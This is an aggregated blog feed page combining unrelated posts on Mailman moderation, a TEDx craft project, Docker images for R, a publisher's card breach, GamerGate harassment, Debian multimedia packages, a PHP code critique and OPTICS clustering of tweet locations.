Planet Russell


Planet DebianGunnar Wolf: Listadmin — *YES*

Petter posted yesterday about Listadmin, the quick way to moderate mailman lists.

Petter: THANKS.

I am a fan of automatization. But, yes, I had never thouguht of doing this. Why? Don't know. But this is way easier than using the Web interface for Mailman:

$ listadmin 
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... 

[1/1] ============== ======
Subject:  Invitación al Taller Insumo Producto                          
Reason:   El cuerpo del mensaje es demasiado grande: 777499    Spam? 0  
Approve/Reject/Discard/Skip/view Body/Full/jump #/Undo/Help/Quit ? a
Submit changes? [yes] 

fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue
fetching data for ... nothing in queue

I don't know how in many years of managing several mailing lists I never thought about this! I'm echoing this, as I know several of my readers run mailman as well, and might not be following Planet Debian.

TEDBadminton birdies, floppy disks and old toys become art — and connections — in Chiang Mai, Thailand

This resident of Chiang Mai, Thailand, filled a bag with colorful puff balls for a project designed to connect members of the community. Photo: TEDxChiangMai

This resident of Chiang Mai, Thailand, filled a bag with colorful puff balls for a project designed to connect members of the community. Photo: TEDxChiangMai

In the days before their event in Chiang Mai, Thailand, the team at TEDxChiangMai spent a large chunk of their time collecting stuff. All kinds of stuff — the quirky, the old, the new, the unwanted, the loved and the thoroughly weird — that could be used for a collaborative art project on the big day. They found people at their workplaces, shops, studios, and homes and asked them to contribute in the spirit connecting the city.

The exchange would go like this, they told locals turned potential donors: Materials donated to the project — dubbed, “Connecting Creativity,” a play on their event theme: “Creating Connections” — would be given to an attendee at random during the event. With the materials, this attendee would build a craft of their own invention. Afterwards, they’d snap a photo of themselves with the piece and send it to the donor as a thank you.

The community responded in droves. The team collected a wide range of donations, many reflective of the donors’ personalities, lives and work: everything from homemade CDs to badminton birdies, from floppy disks to bells, birthday candles to figurines, faux flowers to old toys. Donors provided their contact information on specially-printed index cards, and these cards and materials were included in 300 grab bags.

On the big day, bags were handed out to attendees at random. Each person was challenged to create something from the items in their bag, with help from baskets of open-to-all extra materials. It was a whir of tape, glue and creativity. And the items they created showed off each attendee’s ingenuity and sense of humor.

Here’s how it worked. First, the donors pose with the bags of materials they contributed:

TEDxChangMai donor 2 TEDxChangMai donor 1 TEDxChangmai donor 4


The crafting begins the day of TEDxChiangMai.


15211721170_8e93d3e044_k edit15398055942_f22cff0279_k_cc 15211651220_710dc5cdf3_k


Attendees pose with their crafts.15398294805_5414631c78_k 15211375040_1fd87fe26b_k 15211645220_5334a574d2_k 15394979571_f106a7709b_k

15375292236_e15af0ec65_k15397769702_e00c07349c_k 15211717238_38d08fd5f2_k 15211777767_3a1a540fd7_k TEDxChangMai donor 3 15375232006_41e79f29a2_k

All photos courtesy of TEDxChiangMai. Find out more about this event »

Planet DebianDirk Eddelbuettel: Introducing Rocker: Docker for R

You only know two things about Docker. First, it uses Linux
containers. Second, the Internet won't shut up about it.

-- attributed to Solomon Hykes, Docker CEO

So what is Docker?

Docker is a relatively new open source application and service, which is seeing interest across a number of areas. It uses recent Linux kernel features (containers, namespaces) to shield processes. While its use (superficially) resembles that of virtual machines, it is much more lightweight as it operates at the level of a single process (rather than an emulation of an entire OS layer). This also allows it to start almost instantly, require very little resources and hence permits an order of magnitude more deployments per host than a virtual machine.

Docker offers a standard interface to creation, distribution and deployment. The shipping container analogy is apt: just how shipping containers (via their standard size and "interface") allow global trade to prosper, Docker is aiming for nothing less for deployment. A Dockerfile provides a concise, extensible, and executable description of the computational environment. Docker software then builds a Docker image from the Dockerfile. Docker images are analogous to virtual machine images, but smaller and built in discrete, extensible and reuseable layers. Images can be distributed and run on any machine that has Docker software installed---including Windows, OS X and of course Linux. Running instances are called Docker containers. A single machine can run hundreds of such containers, including multiple containers running the same image.

There are many good tutorials and introductory materials on Docker on the web. The official online tutorial is a good place to start; this post can not go into more detail in order to remain short and introductory.

So what is Rocker?

rocker logo

At its core, Rocker is a project for running R using Docker containers. We provide a collection of Dockerfiles and pre-built Docker images that can be used and extended for many purposes.

Rocker is the the name of our GitHub repository contained with the Rocker-Org GitHub organization.

Rocker is also the name the account under which the automated builds at Docker provide containers ready for download.

Current Rocker Status

Core Rocker Containers

The Rocker project develops the following containers in the core Rocker repository

  • r-base provides a base R container to build from
  • r-devel provides the basic R container, as well as a complete R-devel build based on current SVN sources of R
  • rstudio provides the base R container as well an RStudio Server instance

We have settled on these three core images after earlier work in repositories such as docker-debian-r and docker-ubuntu-r.

Rocker Use Case Containers

Within the Rocker-org organization on GitHub, we are also working on

  • Hadleyverse which extends the rstudio container with a number of Hadley packages
  • rOpenSci which extends hadleyverse with a number of rOpenSci packages
  • r-devel-san provides an R-devel build for "Sanitizer" run-time diagnostics via a properly instrumented version of R-devel via a recent compiler build
  • rocker-versioned aims to provided containers with 'versioned' previous R releases and matching packages

Other repositories will probably be added as new needs and opportunities are identified.


The Rocker effort supersedes and replaces earlier work by Dirk (in the docker-debian-r and docker-ubuntu-r GitHub repositories) and Carl. Please use the Rocker GitHub repo and Rocker Containers from going forward.

Next Steps

We intend to follow-up with more posts detailing usage of both the source Dockerfiles and binary containers on different platforms.

Rocker containers are fully functional. We invite you to take them for a spin. Bug reports, comments, and suggestions are welcome; we suggest you use the GitHub issue tracker.


We are very appreciative of all comments received by early adopters and testers. We also would like to thank RStudio for allowing us the redistribution of their RStudio Server binary.

Published concurrently at rOpenSci blog and Dirk's blog.


Dirk Eddelbuettel and Carl Boettiger

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Krebs on Security‘Spam Nation’ Publisher Discloses Card Breach

In the interests of full disclosure: Sourcebooks – the company that on Nov. 18 is publishing my upcoming book about organized cybercrime — disclosed last week that a breach of its Web site shopping cart software may have exposed customer credit card and personal information.

Fortunately, this breach does not affect readers who have pre-ordered Spam Nation through the retailers I’ve been recommending — Amazon, Barnes & Noble, and Politics & Prose.  I mention this breach mainly to get out in front of it, and because of the irony and timing of this unfortunate incident.

From Sourcebooks’ disclosure (PDF) with the California Attorney General’s office:

“Sourcebooks recently learned that there was a breach of the shopping cart software that supports several of our websites on April 16, 2014 – June 19, 2014 and unauthorized parties were able to gain access to customer credit card information. The credit card information included card number, expiration date, cardholder name and card verification value (CVV2). The billing account information included first name, last name, email address, phone number, and address. In some cases, shipping information was included as first name, last name, phone number, and address. In some cases, account password was obtained too. To our knowledge, the data accessed did not include any Track Data, PIN Number, Printed Card Verification Data (CVD). We are currently in the process of having a third-party forensic audit done to determine the extent of this breach.”

So again, if you have pre-ordered the book from somewhere other than Sourcebook’s site (and that is probably 99.9999 percent of you who have already pre-ordered), you are unaffected.

I think there are some hard but important lessons here about the wisdom of smaller online merchants handling credit card transactions. According to Sourcebooks founder Dominique Raccah, the breach affected approximately 5,100 people who ordered from the company’s Web site between mid-April and mid-June of this year. Raccah said the breach occurred after hackers found a security vulnerability in the site’s shopping cart software.

Shopping-Cart-iconExperts say tens of thousands of businesses that rely on shopping cart software are a major target for malicious hackers, mainly because shopping cart software is generally hard to do well.

“Shopping cart software is extremely complicated and tricky to get right from a security perspective,” said Jeremiah Grossman, founder and chief technology officer for WhiteHat Security, a company that gets paid to test the security of Web sites.  “In fact, no one in my experience gets it right their first time out. That software must undergo serious battlefield testing.”

Grossman suggests that smaller merchants consider outsourcing the handling of credit cards to a solid and reputable third-party. Sourcebooks’ Raccah said the company is in the process of doing just that.

“Make securing credit cards someone else’s problem,” Grossman said. “Yes, you take a little bit of a margin hit, but in contrast to the effort of do-it-yourself [approaches] and breach costs, it’s worth it.”

What’s more, as an increasing number of banks begin issuing more secure chip-based cards  — and by extension more main street merchants in the United States make the switch to requiring chip cards at checkout counters — fraudsters will begin to focus more of their attention on attacking online stores. The United States is the last of the G20 nations to move to chip cards, and in virtually every country that’s made the transition the fraud on credit cards didn’t go away, it just went somewhere else. And that somewhere else in each case manifested itself as increased attacks against e-commerce merchants.

If you haven’t pre-ordered Span Nation yet, remember that all pre-ordered copies will ship signed by Yours Truly. Also, the first 1,000 customers to order two or more copies of the book (including any combination of digital, audio or print editions) will also get a Krebs On Security-branded ZeusGard. So far, approximately 400 readers have taken us up on this offer! Please make sure that if you do pre-order, that you forward a proof-of-purchase (receipt, screen shot of your Kindle order, etc.) to

Pre-order two or more copies of Spam Nation and get this "Krebs Edition" branded ZeusGard.

Pre-order two or more copies of Spam Nation and get this “Krebs Edition” branded ZeusGard.

Geek FeminismWhy We’re Not Talking About GamerGate

Content warning: stalking, harassment, threats, violence–GamerGate, basically.

Geek Feminism’s lack of a statement about the GamerGate hate campaign has felt conspicuous to me. We’re a community dedicated to promoting justice and equality within geek communities. Documenting harassment and abuse in geek communities is one of our biggest projects. GamerGate is on our beat.

But while our fabulous team of linkspammers has been on top of the story, we haven’t put up a statement.

I spoke to some of our other bloggers about ways we could respond. The conversation we had was pretty illustrative.

Here are the ideas we had, and why we discarded them:

1: A “Seriously, Fuck GamerGate” Post

Why we didn’t:

“Fuck GamerGate” is a fairly obvious statement from us. It might be satesfying to say, but it adds little to the conversation.

And women who’ve said it before us have been stalked, harassed, doxxed, and threatened–some to the point of fleeing their homes.

2. A statement of support for GamerGate’s victims

Why we didn’t:

Telling folks we support them is nice, but it doesn’t provide the victims of these terror campaigns with the practical support they need to protect themselves. Talking about them has a very high chance of exposing them to even more abusers. When you’re the target of an organized campaign of terror, the last thing you need is more attention.

And women who’ve made statements of support have been stalked, harassed, doxxed, and threatened–some to the point of fleeing their homes.

3. An Ada Lovelace-style celebration of women in gaming, where we encourage folks to blog about games they love by women, and women in gaming who inspire them.

Why we didn’t:

We didn’t want to paint a target on anyone’s back.

Women in gaming who’ve gotten positive attention have been stalked, harassed, doxxed, and threatened–some to the point of fleeing their homes.

4. Present an iron hide and dare them to bring it.

Some of us feel guilty for not telling GamerGaters exactly where they can shove the horseshit they have the temerity to present as discourse.

Why we didn’t:

We want to live in a world where terror campaigns like this are ineffective; where that which does not kill us makes us stronger; where good triumphs over obtuse, selfish, cowardly evil. But wanting to live in that world doesn’t make that world real. In this world, oppression and injustice have built a system whereby that which does not kill us often leaves us personally and professionally damaged.

The fantasy that bravado would win the day is appealing, but daring abusers to come for us won’t do anything constructive. As much as we might want to put ourselves between GamerGate and its victims, we can’t. There are too many of them to successfully draw their fire.

We’d just end up getting stalked, harassed, doxxed, and threatened–possibly to the point of fleeing our homes.


By now, you’ve surely noticed the theme here.

It’s tempting to offer cheap platitudes to the women who’ve been the focus of these abuse campaigns, or those who might become them. To tell them to be brave, to speak their truth, to not let violent assholes scare them.

Platitudes won’t keep the cesspits of the internet from backflowing into their homes and workplaces. Platitudes won’t secure their computers and personal information; protect their families from detailed, sexually-explicit death threats; walk their kids to school; or stay at home to protect their pets while they’re at work. Platitudes won’t explain to their bosses why their companies’ websites are being DDOSed. Platitudes won’t stop bullets.

So before you lament how terrible it is to ‘let them win’ by being silent, please stop and think of a better way to phrase “I want to live in a world where the victims of abuse campaigns have a winning move.” Don’t ask women to sacrifice their names, careers, and safety to the fantasy that life is fair.

Telling women to be brave and speak up is telling them to face a violent horde unarmed. We don’t have an effective defense against these terror campaigns. We desperately need one. We’re going to follow up and see if we can develop any effective strategies.

In the meantime, I’ve already painted the target on my back, so I might as well say it.

Fuck GamerGate.

Cory DoctorowInterview with The Geekcast

I sat down at New York Comic-Con with Aaron from The Geekcast podcast for a long, interesting interview (MP3) on a wide variety of subjects about art, computers, games and justice!

Sociological ImagesFrom the Archives: Halloween

It’s that time of year again!  We are about to embark on seven straight days of Sociological Halloween Images.  As usual, you’re welcome and we’re sorry.

Look, Ashley S. is sad already:

1 (2)

In the meantime, enjoy our collection of Halloween posts from years past or visit our Halloween-themed Pinterest page.

Just For Fun


Halloween, Politics, and Culture

Race and Ethnicity

Sexual Orientation


Gender and Kids

The intersection of Race, Class, and Gender

And, for no conceivable reason…

Lisa Wade is a professor of sociology at Occidental College and the co-author of Gender: Ideas, Interactions, Institutions. You can follow her on Twitter and Facebook.

(View original at

Geek FeminismGF classifieds (October, November, and December 2014)

This is another round of Geek feminism classifieds – now quarterly! If you’re looking to hire women, find some people to participate in your study, find female speakers, or just want some like-minded folk to join your open source project, this is the thread for you!

Here’s how it works:

  1. Geeky subjects only. We take a wide view of geekdom, but if your thing isn’t related to an obviously geeky topic, you’ll probably want to give a bit of background on why the readers of Geek Feminism would be interested.
  2. Explain what your project/event/thing is, or link to a webpage that provides clear, informative information about it. Ideally you’ll also explain why geek women might find it particularly awesome.
  3. Explain what you’re looking for. Even if it’s not a job ad, think of it like one: what is the activity/role in question, and what would it involve? What is the profile of people you’re looking for?
  4. GF has international readership, so please be sure to indicate the location if you’re advertising a job position, conference, or other thing where the location matters. Remember that city acronyms aren’t always known world-wide and lots of cities share names, so be as clear as possible! (That is, don’t say “SF[O]” or “NYC” or “Melb”, say “San Francisco, USA”, “New York City, USA” or “Melbourne, Australia”.) And if you can provide travel/relocation assistance, we’d love to know about it.
  5. Keep it legal. Most jurisdictions do not allow you to (eg.) advertise jobs for only people of a given gender. So don’t do that. If you are advertising for something that falls into this category, think of this as an opportunity to boost the signal to women who might be interested.
  6. If you’re asking for participants in a study, please note Mary’s helpful guide to soliciting research participation on the ‘net, especially the “bare minimum” section.
  7. Provide a way for people to contact you, such as your email address or a link to apply in the case of job advertisements. (The email addresses entered in the comment form here are not public, so readers won’t see them.)
  8. Keep an eye on comments here, in case people ask for clarification or more details. (You can subscribe to comments via email or RSS.)

If you’d like some more background/tips on how to reach out to women for your project/event/whatever, take a look at Recruiting women on the Geek Feminism Wiki.)

Good luck!

Don MartiQoTD: Bob Hoffman

The addiction to targeting, which digital technology has only amplified, has derailed the advertising industry from concentrating on its real job—creating interesting messages.

Bob Hoffman

Planet DebianAlessio Treglia: Bits from the Debian Multimedia Maintainers

This brief announcement was released yesterday to the debian-devel-announce mailing list.



The Debian Multimedia Maintainers have been quite active since the Wheezy release, and have some interesting news to share for the Jessie release. Here we give you a brief update on what work has been done and work that is still ongoing.

Let’s see what’s cooking for Jessie then.


Frameworks and libraries

Support for many new media formats and codecs.

The codec library libavcodec, which is used by popular media playback applications including vlc, mpv, totem (using gstreamer1.0-libav), xine, and many more, has been updated to the latest upstream release version 11 provided by Libav. This provides Debian users with HEVC playback, a native Opus decoder, Matroska 3D support, Apple ProRes, and much more. Please see libav’s changelog for a full list of functionality additions and updates.


libebur128 is a free implementation of the European Broadcasting Union Loudness Recommendation (EBU R128), which is essentially an alternative to ReplayGain. The library can be used to analyze audio perceived loudness and subsequentially normalize the volume during playback.


libltc provides functionalities to encode and decode Linear (or Longitudinal) Timecode (LTC) from/to SMPTE data timecode.


libva and the driver for Intel GPUs has been updated to the 1.4.0 release. Support for new GPUs has been added. libva now also supports Wayland.

Pure Data

A number of new additional libraries (externals) will appear in Jessie, including (among others) Eric Lyon’s fftease and lyonpotpourrie, Thomas Musil’s iemlib, the pdstring library for string manipulation and pd-lua that allows to write Pd-objects in the popular lua scripting language.



LASH Audio Session Handler was abandoned upstream a long time ago in favor of the new session management system, called ladish (LADI Session Handler). ladish allows users to run many JACK applications at once and save/restore their configuration with few mouse clicks.

The current status of the integration between the session handler and JACK may be summarized as follows:

  • ladish provides the backend;
  • laditools contains a number of useful graphical tools to tune the session management system’s whole configuration (including JACK);
  • gladish provides a easy-to-use graphical interface for the session handler.

Note that ladish uses the D-Bus interface to the jack daemon, therefore only Jessie’s jackd2 provides support for and also cooperates fine with it.


Plugins: LV2 and LADSPA

Debian Jessie will bring the newest 1.10.0 version of the LV2 technology. Most changes affect the packaging of new plugins and extensions, a brief list of packaging guidelines is now available.
A number of new plugins and development tools too have been made available during the Jessie development cycle:

LV2 Toolkit

LVTK provides libraries that wrap the LV2 C API and extensions into easy to use C++ classes. The original work for this was mostly done by Lars Luthman in lv2-c++-tools.

Vee One Suite

The whole suite by Rui Nuno Capela is now available in Jessie, and consists of three components:

  • drumkv1: old-school drum-kit sampler synthesizer
  • samplv1: polyphonic sampler
  • synthv1: analog-style 4-oscillator substractive synthesizer

All three are provided in both forms of LV2 plugins and stand-alone JACK client. JACK session, JACK MIDI, and ALSA MIDI are supported too.

x42-plugins and zam-plugins

LV2 bundles containing many audio plugins for high quality processing.


Fomp is an LV2 port of the MCP, VCO, FIL, and WAH plugins by Fons Adriaensen.

Some other components have been upgraded to more recent upstream versions:

  • ab2gate: 1.1.7
  • calf: 0.0.19+git20140915+5de5da28
  • eq10q: 2.0~beta5.1
  • NASPRO: 0.5.1

We’ve packaged ste-plugins, Fons Adriaensen’s new stereo LADSPA plugins bundle.

A major upgrade of frei0r, namely the standard collection for the minimalistic plugin API for video effects, will be available in Jessie.


New multimedia applications


Advene (Annotate Digital Video, Exchange on the NEt) is a flexible video
annotation application.


The new generation of the popular digital audio workstation will make its very first appearance in Debian Jessie.


Qt4 front-end for the MPD daemon.


Csound for jessie will feature the new major series 6, with the improved IDE CsoundQT. This new csound supports improved array data type handling, multi-core rendering and debugging features.


DIN Is Noise is a musical instrument and audio synthesizer that supports JACK audio output, MIDI, OSC, and IRC bot as input sources. It could be extended and customized with Tcl scripts too.


dvd-slideshow consists of a suite of command line tools which come in handy to make slideshows from collections of pictures. Documentation is provided and available in `/usr/share/doc/dvd-slideshow/’.


DVDwizard can fully automate the creation of DVD-Video filesystem. It supports graphical menus, chapters, multiple titlesets and multi-language streams. It supports both PAL and NTSC video modes too.


Flowblade is a video editor – like the popular KDenlive based on the MLT engine, but more lightweight and with some difference in editing concepts.


Forked-daapd switched to a new, active upstream again dropping Grand Central Dispatch in favor of libevent. The switch fixed several bugs and made forked-daapd available on all release architectures instead of shipping only on amd64 and i386. Now nothing prevents you from setting up a music streaming (DAAP/DACP) server on your favorite home server no matter if it is based on mips, arm or x86!


HTTP Ardour Video Daemon decodes still images from movie files and serves them via HTTP. It provides frame-accurate decoding and is main use-case is to act as backend and second level cache for rendering the
videotimeline in Ardour.

Groove Basin

Groove Basin is a music player server with a web-based user interface inspired by Amarok 1.4. It runs on a server optionally connected to speakers. Guests can control the music player by connecting with a laptop, tablet, or smart phone. Further, users can stream their music libraries remotely.
It comes with a fast, responsive web interface that supports keyboard shortcuts and drag drop. It also provides the ability to upload songs, download songs, and import songs by URL, including YouTube URLs. Groove Basin supports Dynamic Mode which automatically queues random songs, favoring songs that have not been queued recently.
It automatically performs ReplayGain scanning on every song using the EBU R128 loudness standard, and automatically switches between track and album mode. Groove Basin supports the MPD protocol, which means it is compatible with MPD clients. There is also a more powerful Groove Basin protocol which you can use if the MPD protocol does not meet your needs.


HandBrake, a versatile video transcoder, is now available for Jessie. It could convert video from nearly any format to a wide range of commonly supported codecs.


New jackd midiclock utility made by Robin Gareus.


Laborejo, Esperanto for “Workshop”, is used to craft music through notation. It is a LilyPond GUI frontend, a MIDI creator and a tool collection to inspire and help music composers.


mpv is a movie player based on MPlayer and mplayer2. It supports a wide variety of video file formats, audio and video codecs, and subtitle types. The project focuses mainly on modern systems and encourages developer activity. As such, large portions of outdated code originating from MPlayer have been removed, and many new features and improvements have been added. Note that, although there are still some similarities to its predecessors, mpv should be considered a completely different program (e.g. lacking compatibility with both mplayer and mplayer2 in terms of command-line arguments and configuration).


SMTube is a stand-alone graphical video browser and player, which makes YouTube’s videos browsing, playing, and download such a piece of cake.
It has so many features that, we are sure, will make YouTube lovers very, very happy.


Sonic Visualiser Application for viewing and analysing the contents of music audio files.


SoundScapeRenderer (aka SSR) is a (rather) easy to use render engine for spatial audio, that provides a number of different rendering algorithms, ranging from binaural (headphone) playback via wave field synthesis to higher-order ambisonics.


videotrans is a set of scripts that allow its user to reformat existing movies into the VOB format that is used on DVDs.


XBMC has been partially rebranded as XBMC from Debian to make it clear that it is changed to conform to Debian’s Policy. The latest stable release, 13.2 Gotham will be part of Jessie making Debian a good choice for HTPC-s.


Binaural stereo signals converter made by Fons Adriaensen


Stereo monitoring organiser for jackd made by Fons Adriaensen


Jack clients to transmit multichannel audio over a local IP network made by Fons Adriaensen


Radium Compressor is the system compressor of the Radium suite. It is provided in the form of stand-alone JACK application.


Multimedia Tasks

With Jessie we are shipping a set of multimedia related tasks.
They include package lists for doing several multimedia related tasks. If you are interested in defining new tasks, or tweaking the current, existing ones, we are very much interested in hearing from you.


Upgraded applications and libraries

  • Aeolus: 0.9.0
  • Aliki: 0.3.0
  • Ams: 2.1.1
  • amsynth: 1.4.2
  • Audacious: 3.5.2
  • Audacity: 2.0.5
  • Audio File Library: 0.3.6
  • Blender: 2.72b
  • Bristol: 0.60.11f
  • C* Audio Plugin Suite: 0.9.23
  • Cecilia: 5.0.9
  • cmus: 2.5.0
  • DeVeDe: 3.23.0-13-gbfd73f3
  • DRC: 3.2.1
  • EasyTag: 2.2.2
  • ebumeter: 0.2.0
  • faustworks: 0.5
  • ffDiaporama: 1.5
  • ffms: 2.20
  • gmusicbrowser: 1.1.13
  • Hydrogen:
  • IDJC: 0.8.14
  • jack-tools: 20131226
  • LiVES: 2.2.6
  • mhWaveEdit: 1.4.23
  • Mixxx: 1.11.0
  • mp3fs: 0.91
  • MusE: 2.1.2
  • Petri-Foo: 0.1.87
  • PHASEX: 0.14.97
  • QjackCtl: 0.3.12
  • Qtractor: 0.6.3
  • rtaudio: 4.1.1
  • Rosegarden: 14.02
  • rtmidi: 2.1.0
  • SoundTouch: 1.8.0
  • stk: 4.4.4
  • streamtuner2: 2.1.3
  • SuperCollider: 3.6.6
  • Synfig Studio: 0.64.1
  • TerminatorX: 3.90
  • tsdecrypt: 10.0
  • Vamp Plugins SDK: 2.5
  • VLC: Jessie will release with the 2.2.x series of VLC
  • XCFA: 4.3.8
  • xwax: 1.5
  • xjadeo: 0.8.0
  • x264: 0.142.2431+gita5831aa
  • zynaddsubfx: 2.4.3


What’s not going to be in Jessie

With the aim to improve the overall quality of the multimedia software available in Debian, we have dropped a number of packages which were abandoned upstream:

  • beast
  • flumotion
  • jack-rack
  • jokosher
  • lv2fil (suggested replacement for users is eq10q or calf eq)
  • phat
  • plotmm
  • specimen (suggested replacement for users is petri-foo – fork of specimen)
  • zynjacku (suggested replacement for users is jalv)

We’ve also dropped mplayer, presently nobody seems interested in maintaining it.
The suggested replacements for users are mplayer2 or mpv. Whilst the former is mostly compatible with mplayer in terms of command-line arguments and configuration (and adds a few new features too), the latter adds a lot of new features and improvements, and it is actively maintained upstream.

Please note that although the mencoder package is no longer available anymore, avconv and mpv do provide encoding functionality. For more information see avconv’s manual page and documentation, and mpv’s encoding documentation.


Broken functionalities

rtkit under systemd is broken at the moment.


Activity statistics

More information about team’s activity are available.


Where to reach us

The Debian Multimedia Maintainers can be reached at pkg-multimedia-maintainers AT for packaging related topics, or at debian-multimedia AT for user and more general discussion.
We would like to invite everyone interested in multimedia to join us there. Some of the team members are also in the #debian-multimedia channel on OFTC.


Alessio Treglia
on behalf of the Debian Multimedia Maintainers


Worse Than FailureCodeSOD: The Beginning of the Zend

Karol found a program that needs to look at a timestamp, and determine if that timestamp is before or after an expiration date. The code that was handling this looked like this:

public function _isSmsCodeExpired($id)

        $genDateStr = $this->db()->query(&aposSELECT date FROM table&apos)->fetchColumn();

        if (empty($genDateStr))
            return true;
        $expireDateArr = array();
        $intervalSec = 120;

        $genDataTmp = explode(&apos &apos, $genDateStr);
        $genDataArr = explode(&apos-&apos, $genDataTmp[0]);

        $expireDateArr[&aposyear&apos] = $genDataArr[0];
        $expireDateArr[&aposmonth&apos] = $genDataArr[1];
        $expireDateArr[&aposday&apos] = $genDataArr[2];

        $genDataArr = explode(&apos:&apos, $genDataTmp[1]);

        $expireDateArr[&aposhour&apos] = $genDataArr[0];
        $expireDateArr[&aposminute&apos] = $genDataArr[1];
        $expireDateArr[&apossecond&apos] = substr($genDataArr[2], 0, 2);

        $intervalMin = (int) $intervalSec / 60;
        $intervalSec = (int) $intervalSec - ( $intervalMin * 60 );

        $expireDateArr[&apossecond&apos] += $intervalSec;
        $expireDateArr[&aposminute&apos] += $intervalMin;

        $expireDateArr[&apossecond&apos] += $intervalSec;
        if ($expireDateArr[&apossecond&apos] > 60)
            $expireDateArr[&aposminute&apos] += 1;
            $expireDateArr[&apossecond&apos] = $expireDateArr[&apossecond&apos] - 60;

        if ($expireDateArr[&aposminute&apos] > 60)
            $expireDateArr[&aposhour&apos] += 1;
            $expireDateArr[&aposminute&apos] = $expireDateArr[&aposminute&apos] - 60;

        if ($expireDateArr[&aposhour&apos] > 24)
            $expireDateArr[&aposday&apos] += 1;
            $expireDateArr[&aposhour&apos] = $expireDateArr[&aposhour&apos] - 24;

        $daysInMonth = date("t", strtotime($expireDateArr[&aposyear&apos] . "-" . $expireDateArr[&aposmonth&apos] . "-01"));

        if ($expireDateArr[&aposday&apos] > $daysInMonth)
            $expireDateArr[&aposmonth&apos] += 1;
            $expireDateArr[&aposday&apos] = $expireDateArr[&aposday&apos] - $daysInMonth;

        if ($expireDateArr[&aposmonth&apos] > 12)
            $expireDateArr[&aposyear&apos] += 1;

        $expireDate = new Zend_Date($expireDateArr);
        $now = new Zend_Date();

        if ($now->isEarlier($expireDate))
            return false;
            return true;

The real fun part of this was the choice to use Zend_Date, which not only parses date strings, but also has built in methods to add seconds to a date. Of course, even that’s overkill <script src="" type="text/javascript"></script> for solving this problem. Karol replaced most of the function with this:

return ((strtotime($genDateStr) + $intervalSec) > time()) ;

Planet DebianErich Schubert: Clustering 23 mio Tweet locations

To test scalability of ELKI, I've clustered 23 million Tweet locations from the Twitter Statuses Sample API obtained over 8.5 months (due to licensing restrictions by Twitter, I cannot make this data available to you, sorry.
23 million points is a challenge for advanced algorithms. It's quite feasible by k-means; in particular if you choose a small k and limit the number of iterations. But k-means does not make a whole lot of sense on this data set - it is a forced quantization algorithm, but does not discover actual hotspots.
Density-based clustering such as DBSCAN and OPTICS are much more appropriate. DBSCAN is a bit tricky to parameterize - you need to find the right combination of radius and density for the whole world. Given that Twitter adoption and usage is quite different it is very likely that you won't find a single parameter that is appropriate everywhere.
OPTICS is much nicer here. We only need to specify a minimum object count - I chose 1000, as this is a fairly large data set. For performance reasons (and this is where ELKI really shines) I chose a bulk-loaded R*-tree index for acceleration. To benefit from the index, the epsilon radius of OPTICS was set to 5000m. Also, ELKI allows using geodetic distance, so I can specify this value in meters and do not get much artifacts from coordinate projection.
To extract clusters from OPTICS, I used the Xi method, with xi set to 0.01 - a rather low value, also due to the fact of having a large data set.
The results are pretty neat - here is a screenshot (using KDE Marble and OpenStreetMap data, since Google Earth segfaults for me right now):
Screenshot of Clusters in central Europe
Some observations: unsurprisingly, many cities turn up as clusters. Also regional differences are apparent as seen in the screenshot: plenty of Twitter clusters in England, and low acceptance rate in Germany (Germans do seem to have objections about using Twitter; maybe they still prefer texting, which was quite big in Germany - France and Spain uses Twitter a lot more than Germany).
Spam - some of the high usage in Turkey and Indonesia may be due to spammers using a lot of bots there. There also is a spam cluster in the ocean south of Lagos - some spammer uses random coordinates [0;1]; there are 36000 tweets there, so this is a valid cluster...
A benefit of OPTICS and DBSCAN is that they do not cluster every object - low density areas are considered as noise. Also, they support clusters of different shape (which may be lost in this visualiation, which uses convex hulls!) and different size. OPTICS can also produce a hierarchical result.
Note that for these experiments, the actual Tweet text was not used. This has a rough correspondence to Twitter popularity "heatmaps", except that the clustering algorithms will actually provide a formalized data representation of activity hotspots, not only a visualization.
You can also explore the clustering result in your browser - the Google Drive visualization functionality seems to work much better than Google Earth.
If you go to Istanbul or Los Angeles, you will see some artifacts - odd shaped clusters with a clearly visible spike. This is caused by the Xi extraction of clusters, which is far from perfect. At the end of a valley in the OPTICS plot, it is hard to decide whether a point should be included or not. These errors are usually the last element in such a valley, and should be removed via postprocessing. But our OpticsXi implementation is meant to be as close as possible to the published method, so we do not intend to "fix" this.
Certain areas - such as Washington, DC, New York City, and the silicon valley - do not show up as clusters. The reason is probably again the Xi extraction - these region do not exhibit the steep density increase expected by Xi, but are too blurred in their surroundings to be a cluster.
Hierarchical results can be found e.g. in Brasilia and Los Angeles.
Compare the OPTICS results above to k-means results (below) - see why I consider k-means results to be a meaningless quantization?
k-means clusters
Sure, k-means is fast (30 iterations; not converged yet. Took 138 minutes on a single core, with k=1000. The parallel k-means implementation in ELKI took 38 minutes on a single node, Hadoop/Mahout on 8 nodes took 131 minutes, as slow as a single CPU core!). But you can see how sensitive it is to misplaced coordinates (outliers, but mostly spam), how many "clusters" are somewhere in the ocean, and that there is no resolution on the cities? The UK is covered by 4 clusters, with little meaning; and three of these clusters stretch all the way into Bretagne - k-means clusters clearly aren't of high quality here.
If you want to reproduce these results, you need to get the upcoming ELKI version (0.6.5~201410xx - the output of cluster convex hulls was just recently added to the default codebase), and of course data. The settings I used are: coords.tsv.gz
-db.index tree.spatial.rstarvariants.rstar.RStarTreeFactory
-pagefile.pagesize 500
-spatial.bulkstrategy SortTileRecursiveBulkSplit
-algorithm clustering.optics.OPTICSXi
-opticsxi.xi 0.01
-algorithm.distancefunction geo.LngLatDistanceFunction
-optics.epsilon 5000.0 -optics.minpts 1000
-resulthandler KMLOutputHandler -out /tmp/out.kmz
and the total runtime for 23 million points on a single core was about 29 hours. The indexes helped a lot: less than 10000 distances were computed per point, instead of 23 million - the expected speedup over a non-indexed approach is 2400.
Don't try this with R or Matlab. Your average R clustering algorithm will try to build a full distance matrix, and you probably don't have an exabyte of memory to store this matrix. Maybe start with a smaller data set first, then see how long you can afford to increase the data size.

Planet DebianMatthew Garrett: Linux Container Security

First, read these slides. Done? Good.

